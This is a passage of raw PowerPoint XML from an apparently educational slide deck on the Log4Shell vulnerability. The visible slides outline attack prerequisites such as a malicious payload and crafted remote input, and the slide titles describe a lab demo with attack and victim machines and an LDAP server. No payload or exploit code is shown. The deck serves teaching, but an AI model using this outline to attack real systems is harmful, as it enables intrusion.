          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Vulnerable code doesn’t automatically  lead to attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FB22526-D869-E4EC-9FEA-6DF4F2A31734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Vulnerabilities are weaknesses or flaws in software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Vulnerabilities can exist for various reasons, including coding mistakes, misconfigurations, or outdated software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attackers must know how to exploit Log4J vulnerability to launch attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47474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F52E-77CB-2241-0A92-D72BD124B8BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How to exploit Log4J vulnerability?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA71D8AD-948C-6AB9-81E4-3F921CD923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7415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F2C6-D80C-365F-B54A-1A529918F9B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Challenges to launch Log4Shell attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE1FA33-B3D2-B69A-DB10-F54E057FA68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attackers need to identify vulnerable code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attackers need to develop a malicious payload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>what to do with a victim's machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Attackers need to invoke a malicious payload remotely </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>with a crafted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413376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4113</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>383</Paragraphs>
  <Slides>54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 Unicode MS</vt:lpstr>
      <vt:lpstr>Söhne</vt:lpstr>
      <vt:lpstr>Söhne Mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>OCRB</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Log4Shell Vulnerability </vt:lpstr>
      <vt:lpstr>Introduction to Log4Shell vulnerability &amp; attack</vt:lpstr>
      <vt:lpstr>What is Log4Shell vulnerability?</vt:lpstr>
      <vt:lpstr>Log4Shell attack explained</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerable code doesn’t automatically  lead to attacks</vt:lpstr>
      <vt:lpstr>How to exploit Log4J vulnerability?</vt:lpstr>
      <vt:lpstr>Challenges to launch Log4Shell attack</vt:lpstr>
      <vt:lpstr>1. Attackers need to identify vulnerable Code</vt:lpstr>
      <vt:lpstr>A simple web application with a vulnerability</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>2. Attackers need to develop a malicious payload </vt:lpstr>
      <vt:lpstr>What is the malicious payload?</vt:lpstr>
      <vt:lpstr>Where is a malicious payload stored?</vt:lpstr>
      <vt:lpstr>What is LDAP?</vt:lpstr>
      <vt:lpstr>How to access a malicious payload?</vt:lpstr>
      <vt:lpstr>3. Attackers need to invoke a malicious payload</vt:lpstr>
      <vt:lpstr>What is special about the crafted input to a program by attackers?</vt:lpstr>
      <vt:lpstr>An input pattern to invoke malicious payload</vt:lpstr>
      <vt:lpstr>An HTTP request example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Log4Shell Attack Demo</vt:lpstr>
      <vt:lpstr>Attack infrastructure requirements</vt:lpstr>
      <vt:lpstr>Interactions between each role </vt:lpstr>
      <vt:lpstr>Software and version requirements</vt:lpstr>
      <vt:lpstr>1. Set up an attack machine</vt:lpstr>
      <vt:lpstr>2. Set up a victim machine</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>2. Set up an LDAP server</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>3. Attack machine</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Appendix</vt:lpstr>
      <vt:lpstr>Solving LDAP download issue </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Can be deleted later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cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-14T14:43:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-29T20:23:07Z</dcterms:modified>
</cp:coreProperties>
</file>